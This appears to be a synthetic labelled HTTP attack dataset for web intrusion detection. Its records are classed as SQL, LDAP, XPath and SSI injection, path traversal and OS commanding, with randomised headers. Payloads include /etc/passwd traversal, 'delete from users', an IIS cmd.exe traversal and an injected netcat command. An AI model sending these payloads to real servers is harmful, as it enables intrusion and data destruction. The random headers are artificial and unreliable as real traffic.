If-Match: "eJwuOha1hcC2WGUh"
If-None-Match: *
If-Range: "R3Y3Nvun6IzWFuN002"
Max-Forwards: 5867
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic emg1ZWk5ZWE6NHNMZWdEdTk=
Authorization: NTLM Z3VjYWVzbXp6b2FuYUhubWZ3YXBhaXRvc29ybW9zbUYxeXJnZGN0cmVvY2VsbXNu
Range: -66
Referer: /cnrlef/8ofss.jsp
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.1 (X11; U; Solaris 9.7; tn-as; rv:4.9.0) Gecko/50896610
UA-CPU: x86
UA-Disp: 814,8344,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: 9.2 www.dcHe.tiff, 8.8 247.174.49.81
Transfer-Encoding: compress
Upgrade: giet/3.0
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 32378960313
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42216
Start - Id: 40340
class: SSI
GET /yQ8PBubu-VSZXiPHwO/arlibfZGn3-62/FEk/dlgange7rst/io.exe?BniOZGtcOVU=%3C%21--+++%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5CVaipatFhaC%5Cewq%5Cus8e.exe+++d%3A%5CZsahetivy%5Cwww.ngtila.org%5Cet1dB2g%5Cdatabase.mdb+++++%2Fx+++++exporttofoxpro%22--%3E&ietJy7dtrfiO=348&ar=2I8P%40kzHf&eyhcRJira=42210021 HTTP/1.1
Host: 64.208.217.171
Connection: keep-alive
Accept: audio/*;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.1, compress;q=0.4
Accept-Language: *;q=0.3
Cache-Control: max-age=918
Client-ip: 29.195.65.50
Cookie: mO=lWzW15jw2f
Cookie2: $Version="3"
Date: Tue, 25 Jan 05 06:48:43 CET
ETag: W/"sixONzZFOaxVNExZ-Zd6"
Expect: 100-continue
If-Modified-Since: Sat, 01 Oct 05 17:50:34 UTC
If-Unmodified-Since: Tue, 15 Mar 05 23:18:32 CET
If-Match: "7Glw6.2VFNyQG7Y"
If-None-Match: *
If-Range: Wed, 08 Jun 05 18:42:08 CET
Max-Forwards: 3
Pragma: no-cache
Range: -601,-84841,57-6653
Referer: /etiwir7.jsp
User-Agent: lmumc5JLy http://www.a5dlEfc.be
UA-OS: Windows NT
Transfer-Encoding: compress
----: --------------------------

null

End - Id: 40340
Start - Id: 36362
class: PathTransversal
GET /anoi4tn3eiljp/hUkDAPEK8f7Z8yZv/oX.n-GwU.shtml?Tfa7eu=X&ixexSHlb62=06491&hnr3xsafrNiuruo=eTLAruw91H&pt6omaqetrshgwq=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&1ttRtascit9=861787&RrtSo6belt=vjise1N6&5vbscriptjWZ@X2j@=81&nurhtTrestbWeBg=aefe+eS&susrjiIm6aYxf=48 HTTP/1.1
Host: www.rgFin.ch
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: ee-hn, carr-rtSo
Cache-Control: no-store
Client-ip: 74.137.160.134
Cookie: lo9etstxsuueoii=44745446;emmlerSesfetdc=passwddec;edt=837;Oztsttteen7=3;mlgcee4waX=raccepteiguntiycr/at
Cookie2: $Version="345"
Date: Wed, 25 Apr 07 21:29:35 CET
ETag: W/"FVdxZvFAz4j68bNZ95W0"
Expect: eatl
From: sotSFlSe@qiksat.biz
If-Modified-Since: Sat, 26 Jun 04 17:44:28 GMT
If-Unmodified-Since: Sat, 01 Jul 06 17:33:17 CET
If-Match: "fRJ2SE1NLWXUMIMzxa-g"
If-None-Match: "HUKu3rfLS4iBL5rZL0Xz"
If-Range: *
Max-Forwards: 64
MIME-Version: 9.4
Pragma: ypgo=nl9i
Proxy-Authorization: Digest qop=auth
Authorization: eezer ieo6omr=hgtisDse
Range: 75-618834,757-411,77394-267269
Referer: http://us8beetn.ch/xgnreL/8itLe93.pl
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/5.4 (X11; U; Solaris 6.2; al-rs; rv:7.1.3) Gecko/63443653
UA-CPU: MIPS
UA-Disp: 930,1675,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6269x194
Via: HTTP/9.0 12.144.48.129
Transfer-Encoding: deflate
Upgrade: T8m/5.2, fg1ie/5.0, hrhh/0.4
Warning: 864 193.255.239.241 "chohneoi" 
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36362
Start - Id: 41217
class: SqlInjection
GET /dhojw05pIp@JoxT/Etkazeefs/adr6tbhn91oeDFisims1/nsxnTta9e4osieAnss8.html? HTTP/1.0
Host: 154.16.175.254
Connection: close
Accept: application/*;q=0.0, image/*;q=0.8, text/*
Accept-Encoding: '  );     delete   from     users; commit;   dummy(    '
Accept-Language: 5pdg-gepaaei, Po-tuftr;q=0.9, rt-orScE, nmxeBeej-dte
Client-ip: 14.158.100.251
ETag: "BjDMsX3-UNmjL7Yqx50"
If-Range: *
Referer: /Io3eink/RIee.swf
User-Agent: Mozilla/3.5 (X11; U; Linux i386 6.1; dn-nu; rv:4.5.0) Gecko/12983512

null

End - Id: 41217
Start - Id: 44859
class: PathTransversal
GET /EsErhplibvbscriptJmail_/caHerti.tiff?woto=olocationaNL%26rni&yVltAseueaNEg=rT5%25&rTtrzRt55a=doleacEeewneZ8fdi&qdrsdan7Ng=fyghe8+Iw&vr6ttdneecx=28&nmO9l=023451&Orw=collection%28+++file%3A%2F%2F%2Fc%3A%2Faeroh%2F0mr7.xml+++%29&voix=qi&utgreyr2eO=id4iwba2sd&T5tmaiei=37998138&osdtrmgR=l9eteaoaTarqmoeon&1eatn=56042305 HTTP/1.0
Host: 1.3.121.140
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-5, hz-gb-2312, utf-8;q=0.9, iso-8859-8-i, windows-1254
Accept-Encoding: *
Accept-Language: hgUeea-moi, 38r-eu;q=0.4, yny7ce-vdes, UeShi5t2-2essrtg;q=0.6, re9if-Besssf
Cache-Control: only-if-cached
Client-ip: 31.199.198.5
Cookie: 5jTEmt@-KyKinput=8ehe97
Cookie2: $Version="27"
Date: Fri, 12 Jan 07 17:17:13 UTC
ETag: W/"2Hr_1mB_sXpKsq.@5EV"
Expect: 100-continue
From: netotmi@oanhTettwr.cz
If-Modified-Since: Wed, 25 Feb 09 05:14:43 GMT
If-Unmodified-Since: Mon, 11 Feb 08 18:20:34 UTC
If-Match: *
If-None-Match: *
If-Range: "Gp7y_H44dVZHIAb"
Max-Forwards: 03
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic dWRlNmk6eG1ocHA4Zjk=
Authorization: Basic czRzaWVyOmFUckNzdXJu
Range: 3752-,303-8,-33345
Referer: http://www.opma.uk/im4uet/3iAgu/a0hzdrTn/w8jor.asmx
TE: trailers,trailers,gzip;q=0.8
Trailer: Date
User-Agent: Mozilla/4.1 (compatible; o8eiN; Open BSD i586; fnts3deeih)
UA-CPU: StrongARM
UA-Disp: 280,070,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 458x842
Via: 8.2 224.145.89.72, 4.4 www.hlijaAhh.htm, 5.1 247.212.47.152
Transfer-Encoding: compress
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 565 www.9hmbio.js "egRIp9dtnpPtahcsat" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 24997
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44859
Start - Id: 42476
class: SqlInjection
GET /wLh/aeayc6anwpyfauie2x/iXKsZzIi.mspx?ieebho=mb&k.RKaFkhomeDDO=1echobilttim%2B57%2Bhttpsei&8tiigtdarwu8ede=OR++%27cdrg%27++IN+%28++++%27++++%27++++%29 HTTP/1.0
Host: www.ceehiEdhf.de
Connection: keep-alive
Accept: image/*;q=0.4, application/postscript;q=0.9
Accept-Charset: windows-1250, iso-8859-6
Accept-Encoding: 
Accept-Language: nhonKip-cexu4rl, ohldb-a;q=0.4, y-naty;q=0.8, 13Z-dz, tiaet-ydq
Cache-Control: no-transform
Client-ip: 93.245.243.70
Cookie: ehcfue=csrn
Cookie2: $Version="01"
Date: Thu, 12 Jul 07 19:11:03 GMT
ETag: W/"O31nD@J3Iu0A1HEKQNyE"
Expect: slai
From: sheo@RafNi.uk
If-Modified-Since: Wed, 17 Oct 07 04:41:04 GMT
If-Unmodified-Since: Mon, 18 Oct 04 21:41:00 CET
If-Match: "UlDPhJKra-i9UTFwv"
If-None-Match: "yo2o7LlG6dr701a7PRs"
If-Range: Sun, 13 Sep 09 17:59:33 CET
Max-Forwards: 88
MIME-Version: 4.3
Pragma: Df='n2'
Proxy-Authorization: NTLM ZXR0dGlub0RpZjRlZTZvZTdkc2FubjZhOXRhc28ybmlhbm1vcmRueGls
Authorization: eptd iSea=snwne
Range: 7-59040
Referer: /i2Cita0c.tiff
TE: gzip,gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: osco/1.5.0.0
UA-CPU: 68000
UA-Disp: 1488,9515,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 733x829
Via: HTTP/5.4 183.214.192.178, FTP/8.1 www.heag.html
Transfer-Encoding: identity
Upgrade: mc9c/0.1, Rek40w/1.3, rcow/4.1
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42476
Start - Id: 45191
class: PathTransversal
GET /../../? HTTP/1.0
Host: 66.70.191.189
Connection: close
Accept: text/html, video/quicktime, audio/*;q=0.2
Accept-Charset: utf-8
Accept-Encoding: 
Accept-Language: kaoyelY-pgit
Cache-Control: max-stale=54369
Client-ip: 30.124.242.244
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Fri, 04 Feb 05 04:41:15 UTC
ETag: W/"5P7OUM98bOhr6Jn"
Expect: 100-continue
From: azaxo6@aowhloiie.net
If-Modified-Since: Tue, 21 Jun 05 09:31:28 GMT
If-Unmodified-Since: Thu, 10 Feb 05 09:44:14 CET
If-Match: *
If-None-Match: "wkW908nD@s64TjzHLTy"
If-Range: Sat, 30 Jul 05 12:00:22 CET
Max-Forwards: 8730
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest uri=/teoadOp/uies/ebnnhteb/ariuiir/caepcrnU.pdf
Authorization: NTLM bGluZXNibG1hZmFxZ2hlcmNhcHR0QW9IaWk3YmF1bTNzc3Zz
Range: 338-,-31040,26925-
Referer: /dUdo/Edfl/rntab/tcnnh.css
TE: trailers,trailers
Trailer: User-Agent
User-Agent: 1gzhN16@ http://www.sbeH.cz
UA-CPU: StrongARM
UA-Disp: 749,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4912x155
Via: 5itt/6.3 www.aogenne.js, bhh/5.3 www.nkrnp.htm
Transfer-Encoding: identity
Upgrade: eimdea/6.6
Warning: 653 www.et0aI7.gif "huimuuaeets1Hsgeeh3t" 
X-Forwarded-For: 254.171.174.88
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45191
Start - Id: 38838
class: LdapInjection
GET /2TOmuipti/yhyMyeZsa@g35WAC.pl?Z15BandF=%29+%28++%7C++%28displayName%3Dhad*%29++++%28name+++%3D++++had*++%29%28++++mail%3Dhad*%29 HTTP/1.0
Host: 152.147.81.133
Connection: wnse
Accept: */*;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=009
Client-ip: 109.34.220.88
Cookie: 7thepd9iilaevv3=hsTr;aiceneedfahh=3830941;nr=de4euEut0is
Cookie2: $Version="62"
Date: Sun, 29 Jan 06 18:34:26 CET
ETag: W/"Pd2SaruN6n0VuUgvz"
Expect: 100-continue
From: oeee@geqtla3o.org
If-Modified-Since: Sun, 08 May 05 07:28:24 CET
If-Unmodified-Since: Sun, 09 Mar 08 08:08:04 GMT
If-Match: *
If-None-Match: *
If-Range: "4sgc7PzaIXD3Qy4z@Npk"
Max-Forwards: 92
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: oxtNc mgheq=svee9Num
Range: -83,96723-251385,-0483
Referer: /nmtnl.exe
TE: gzip,chunked;q=0.0,chunked
Trailer: User-Agent
User-Agent: Mozilla/4.7 (X11; U; Linux i586 9.3; zz-en; rv:0.0.7) Gecko/18617382
UA-CPU: PowerPC
UA-Disp: 3032,6825,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 072x4241
Via: FTP/3.8 148.150.156.63, HTTP/6.3 111.10.246.166, necr/4.9 www.r8o1sf.htm
Transfer-Encoding: Eo5p; HcvteOsl=eaceet
Upgrade: tocy3/3.8
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 220.205.21.58
X-Serial-Number: 465738
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38838
Start - Id: 44268
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.swqe.st
Connection: close
Accept: */*
Accept-Charset: windows-1255
Accept-Encoding: identity, gzip;q=0.6, identity, deflate;q=0.9
Accept-Language: m3-z, omeSt-g2sdote;q=0.1
Cache-Control: max-age=834
Client-ip: 225.50.172.247
Cookie: lqr=lPIOUuV4;br=aXcE;45oEoa4ro=4015192
Cookie2: $Version="544"
Date: Wed, 01 Jun 05 22:39:11 GMT
ETag: W/"JQx0uHTwXQsPyN32k.C"
Expect: 100-continue
From: Ce9h0dvt@naeheOu.st
If-Modified-Since: Mon, 19 Sep 05 05:53:20 GMT
If-Unmodified-Since: Fri, 07 Apr 06 21:48:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM VGxycmhjbG53cjdsc0Z0aWVuaGl0bmVib2lhZWk3U2ljYXZ4bnNpb2JybG0=
Authorization: nsxuo aialrtes=etcah0s
Range: 1630-9,-816
Referer: /Ie9t7o/apbrlnj/aylokwhA/Iae8h/rTiu.avi
TE: gzip;q=0.0,chunked,deflate
Trailer: User-Agent
User-Agent: lmalamra7
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7064x6561
Via: 3.5 250.32.202.244:89, 5.5 www.dDase.css
Transfer-Encoding: gzip
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44268
Start - Id: 49109
class: XPathInjection
GET /lsGzV1n/pNs8q/ajhifmai/o@Z8b3R/ygsjhrjGcoadoistieRt.aspx?df3cdmeat=eepnd5oxdip+%5Dbistof&positioneY4=t5abgee%27+++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or++++%2741hecd%27%3D++++%27&S8rlo8osoEie=06173&t1taltbdiprh8u=ejPnTEsLpN&h20a2=ires&rn=iafwl8eih8se&bo3k0=3128996631&iachlfdgtbng=fo2havinggeycguatrr%7Casy2a&slmO7nalYiastEq=execexecsuinlNNe2yRt%40t5&bisuacaoretitoo=2e+Ccopyi%29pcn39euttoformsr&osagt=sbn+i&4AjOlnGuw6ebhve=utmwaay HTTP/1.1
Host: www.eZiieewi.biz
Connection: keep-alive
Accept: image/*, application/zip
Accept-Charset: windows-1253, windows-1252;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 28.123.132.190
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="48"
Date: Sun, 11 Jan 09 21:08:00 CET
ETag: "aJP_ykVHbIdAGXuNdz"
Expect: 100-continue
From: o1Nf5@ocset.it
If-Modified-Since: Mon, 14 Feb 05 08:13:39 GMT
If-Unmodified-Since: Sat, 06 Dec 08 04:43:18 GMT
If-Match: *
If-None-Match: *
If-Range: "_wJcmfZ2iKG0q9NU"
Max-Forwards: 8
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZmhkZTp0dWV1dA==
Authorization: Basic YXRpZm46YW1uRWhtbg==
Range: 21992-101995,769527-91853,911330-
Referer: /ahLpitq/hdcra.php3
TE: trailers,trailers,chunked;q=0.9
Trailer: Referer
User-Agent: Mozilla/9.0 (Machintosh; U; PPC Mac OS X 0.2; us-tx; rv:4.7.4) Gecko/75533624
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9298x371
Via: 2.0 www.h9e5j.html:47729, FTP/7.3 234.213.46.162
Transfer-Encoding: compress
Upgrade: ftis/8.4, aiar9w/5.5, wticg/0.0
Warning: 839 245.108.185.165 "nonbs" 
X-Forwarded-For: 0.51.163.102
X-Serial-Number: 2617169573
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49109
Start - Id: 49591
class: XPathInjection
GET /cviceasricTtm6pomx/enforuso1eawh/0hzZKH4qWQyRpH9co@/jrJdP1LvZWGtsf_f/8ics1ll0m5mle/VckCsKa@Pv/ofgpedagmnxh2H.jpg?ehb9te=zgsnEnetcatp&0ds5esrpttdsex=8996419826&uBT@.Ereplace_j=tre%27+or+++6+++%3C+count%28path%2Fchild%3A%3A*%29+or++++%27Pdhu%27+++%3D+%27&eehms=enlrnqr&gmaI=534&Fv_V=rp%29&OncnyryToI=gnic&qoimr=8&etd=nl&i5gost=7019180209&otueayuIieon=058691322 HTTP/1.0
Host: www.ebUMaaHni.biz
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.7, macintosh, windows-1255;q=0.4, windows-1255, windows-1250;q=0.1
Accept-Encoding: 
Accept-Language: wh-N
Cache-Control: only-if-cached
Client-ip: 132.114.34.1
Cookie: cD=union;aWSJem=177
Cookie2: $Version="81"
Date: Sun, 31 May 09 18:46:42 GMT
ETag: W/"RZdAP6_vcqBMbAH1b"
Expect: 100-continue
From: rmya@typuTon9h.uk
If-Modified-Since: Wed, 14 Oct 09 22:41:20 UTC
If-Unmodified-Since: Fri, 03 Feb 06 01:01:40 UTC
If-Match: "yuUsyu_rHXkxVVf12F"
If-None-Match: *
If-Range: Thu, 17 Apr 08 09:13:02 GMT
Max-Forwards: 58
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM ZGRhaWJzeWVub0VzdHN0ZnRIZTBhZXNodHN6MW1ud3RiZWo3Yw==
Authorization: Digest realm
Range: 124-314534,89-
Referer: http://www.itHathi.org/4e9s1U.sh
TE: deflate;q=0.8,chunked;q=0.4
Trailer: If-Range
User-Agent: Mozilla/4.9 (Machintosh; U; PPC Mac OS X 2.4; jT-3g; rv:6.0.3) Gecko/14006054
UA-CPU: StrongARM
UA-Disp: 427,3177,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 122x540
Via: eeeMst/2.4 244.252.198.119, rmnb/7.1 www.oaENaF.gif, FTP/4.1 13.11.4.99:185
Transfer-Encoding: identity
Upgrade: hTS/5.6
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 49591
Start - Id: 42708
class: SqlInjection
POST /bO/ru9XadminUxD9LJ_hLW/v.W2K2U/b_gjB/ndt3AjnYzd90eri.aspx? HTTP/1.1
Content-Length: 122
Content-Language: se
Content-Encoding: deflate
Content-Location: http://aecau.it/nhee3j1/hmveeuel/owOwnC/avsn/xdhjya.wav
Content-MD5: ZWludG91c2VodXpleVVhaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Sep 06 01:01:17 UTC
Last-Modified: Sat, 12 Jan 08 08:18:13 GMT
Host: www.h2tfaew.de
Connection: keep-alive
Accept: text/plain;q=0.8
Accept-Charset: windows-1258;q=0.1, cp-936;q=0.9, x-mac-roman;q=0.8, windows-1251
Accept-Encoding: deflate, deflate;q=0.1, identity, identity
Accept-Language: OR   008093>03532772
Cache-Control: no-store
Client-ip: 228.125.37.130
Cookie: 1ues4fewodgpx=uHtlofoxsr;RLsdha=r0et;6pyuctoilay=d)so
Cookie2: $Version="134"
Date: Fri, 09 Jul 04 24:10:34 GMT
ETag: "vf1Vj8Dgz1cDubx-"
Expect: ydtvhiN
From: leyen5sh@mOloiam5r.biz
If-Modified-Since: Tue, 15 Jan 08 10:19:38 CET
If-Unmodified-Since: Sat, 21 Feb 04 12:56:15 CET
If-Match: *
If-None-Match: "Ucndbv_vfKhlIpNAphLM"
If-Range: Mon, 03 Dec 07 07:24:50 CET
Max-Forwards: 3
MIME-Version: 9.7
Pragma: areatpd=nrsaIta
Proxy-Authorization: Basic cjVuZDp4Z0ZlaHZoZg==
Authorization: Digest username="lgR2ato"
Range: 30889-130,957-,45-484050
Referer: /ftlm/useauiY/eeiibtce.ace
TE: deflate,trailers,trailers
Trailer: TE
User-Agent: ugrijud
UA-Disp: 179,0813,8
UA-OS: Windows 98
UA-Color: color16
Via: 2.6 www.rDnBdoe.jpg, osHTyt/0.6 www.snjtOtQ.jpg
Transfer-Encoding: 4fatc
Upgrade: stwept/3.7, 3caoys/9.9
Warning: 987 208.120.245.13 "dsnf" 
X-Forwarded-For: 18.244.48.193
X-Serial-Number: 0088484140288112965
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

eR=oh8mmxpzA&smih7ta=0154412&a0itin3TiUrrh=8440417958&f0t=vs&v9tedqftsnsqej=92&dEs=59&aB=aR7&Rs4EH=glocationwuRercp :las

End - Id: 42708
Start - Id: 46153
class: PathTransversal
GET /uy@zU8@J/an_Jo.asp?hrb=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&ootOecniesppsy=726933249 HTTP/1.0
Host: www.irttyn.be
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-cyrillic, iso-8859-15;q=0.4, windows-1251, windows-1252
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 172.17.95.67
Cookie: ihi=24;tr8rorinqsta= aeeee$|Ka;tpol=576034;o9s=i ;eeia9Jlst=25583186
Cookie2: $Version="64"
Date: Thu, 13 Sep 07 10:47:51 CET
ETag: W/"IjRyuTEU8gtrNwZt"
Expect: 100-continue
From: ehreer@1nwhcp.uk
If-Modified-Since: Tue, 21 Dec 04 24:32:31 CET
If-Unmodified-Since: Sun, 28 Nov 04 18:28:03 CET
If-Match: "T6doRXFCUyPO3O2jl"
If-None-Match: "j-iC5-Wnhme9DS9iq5n"
If-Range: Tue, 06 Jan 04 24:08:55 UTC
Max-Forwards: 24
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest username="ogaE"
Range: 930922-
Referer: http://www.ptba5.com/fRldh/ndsr.png
TE: trailers,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.7 (compatible; reim; Mac OS X; Sdsa)
UA-CPU: x86
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Pixels: 9278x723
Via: 6.0 www.nslvg.png, HTTP/8.7 236.214.149.224, hrel/6.1 www.aoEJee.png
Transfer-Encoding: deflate
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 89.128.131.86
X-Serial-Number: 678023085
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46153
Start - Id: 37491
class: LdapInjection
GET /cei.jsp?hhRTri2=kraIyichhs9ds&oaetm76lad1ye3=kruiWeaatntenakiAj&tsosweaSdfme=Y5igeecOa&d1gEaDmdrse0k=74436 HTTP/1.1
Host: 205.156.254.193:4518
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.1
Accept-Language: *
Cache-Control: max-age=6492
Client-ip: 220.105.164.31
Cookie: EXNebhVYw-=ayz)(&(objectClass=dd*);H1-telnetIF9=5089088;tgr1=nydG;gewdwettrt=mtPnqrOQaHH;vUtut9ttY8_=9l)nhw;taw= 8T-anenhoe3e
Cookie2: $Version="839"
Date: Fri, 06 Aug 04 21:50:20 CET
ETag: "qWAZKuUD6VPcO2_G"
Expect: 100-continue
From: slnBa@eMe2ihdtwl.cz
If-Modified-Since: Wed, 07 Nov 07 08:48:06 UTC
If-Unmodified-Since: Thu, 12 May 05 13:12:58 CET
If-Match: *
If-None-Match: "kxQ7Jk1HnizsQG62omV5"
If-Range: *
Max-Forwards: 8
MIME-Version: 2.2
Pragma: oas9o=huta
Proxy-Authorization: NTLM bjJ5b2g5YWVlM3ZtcGVVbjBxZWFlYWNwZTdzc25zaXRjZXNueW1ldDllbGE=
Authorization: Digest qop=llsthte
Range: 8-,17-7941
Referer: /ieiw/eushAyN/loaa/po5co.nsf
TE: trailers
User-Agent: zsoqe (rUv2q63; eF9WJA; o@VpNV-; 00La9_W7.; 1czk6G9)
UA-CPU: PowerPC
UA-OS: Linux
Via: eaaoN/5.8 133.45.139.162, 6.1 75.1.122.184, 1.7 www.ccnjN.css:74
Transfer-Encoding: compress
Upgrade: oEr/4.8
Warning: 872 www.iHezee.gif "dmg7ismd" "Thu, 18 May 06 24:03:11 GMT"
X-Serial-Number: 89910822310
----: -------------

null

End - Id: 37491
Start - Id: 35439
class: SqlInjection
POST /bM_m3G/4./nFD_wC/lEh/EBLe_g.Q/wd/F6ncLIvbHfoSr.mspx? HTTP/1.0
Content-Length: 217
Content-Language: tnkgsJC,at
Content-Encoding: compress
Content-Location: /nnat.gif
Content-MD5: YWUzaHRwRWN1am5HVHRoaQ==
Content-Type: application/x-www-form-urlencoded
Host: 199.84.81.16
Connection: ss6te
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: '   group by    users.id   having     44274=44274
Accept-Language: *;q=0.2
Cache-Control: min-fresh=91
Date: Wed, 07 Jul 04 21:53:01 CET
ETag: "6xnMS8K6Tgx8_10I9oD"
If-Unmodified-Since: Sat, 17 Nov 07 17:42:25 GMT
If-None-Match: *
If-Range: "7_1vX9vL63td0sEkXW"
Max-Forwards: 40
MIME-Version: 9.4
Authorization: Digest uri=/eiortt.jpg
Referer: http://www.aotnlpiE.be/toshtl/agrEemln/0w1e/r6l1.png
User-Agent: Mozilla/9.6 (X11; U; Linux i586 2.3; aa-cU; rv:7.6.0) Gecko/58537615
UA-OS: Windows 95
Via: nrfhrx/4.6 www.tiyuf.tiff
Transfer-Encoding: deflate
X-Forwarded-For: 49.126.222.189

hxaqsm=d(m5htpass>x&ococrnemdt=s0a&taoAs=avtnodeb|eI&ry1imb4eesot=atoOisdeatez  c&7itkae2tEkT=17043835&ehe7=527166&kB5HeTmeeehe=87072475&lutthsnswtee=oi&LF9Ah2HjDQn=35&baA20Nhn=?&i;&S9ie0i=91795&powuveti=h

End - Id: 35439
Start - Id: 43500
class: OsCommanding
GET /drdNkD/k@BD0CfBVyjt4zIl/1-VFrj5iWGInj0/pJateelYetcjntede/nl/sm/tyTrtno3.1.asp?auhl2ft3ol0Th=fvV&nmoo0wC=%5B&c7arsresEeAjwt=oftesrdderih&ruwfxAgl=sirS%7CwllpM%3Fed%25p&byid=eurui&hht5zkrafcrtsc=0&nhktd=p.DbCni77i&JIOLV8JSR5B=9er&ru2LnSexL3l0H=%250a+++nc++www.enetas.com++80%3B&onoerjRtcWeLatn=tbToDY-r&pZacceptK73Q-Ic8E=blntqe&ikleaido=izeua3replaceml&efh9Nele=u%29tiyhngVhldsai HTTP/1.1
Host: 158.197.159.56
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.3, gzip, gzip;q=0.9, deflate;q=0.4, deflate;q=0.9
Accept-Language: 9fodndo-rdbgarp, ir3dlept-c;q=0.1
Cache-Control: eymocds='ic6'
Client-ip: 220.97.61.79
Cookie: Pp8noHi7nayle5=9095;0Adot=opun4Meen;tDideuHgL=ttrsmxx43aodmt;5O1uaot=$
Cookie2: $Version="514"
Date: Tue, 10 Oct 06 11:10:07 GMT
ETag: "i5b4tekVhyWTS7JAkw0"
Expect: reNwssAo=Iiubo;seruenh=eiwamf
From: ng6Ncd@ciehr.com
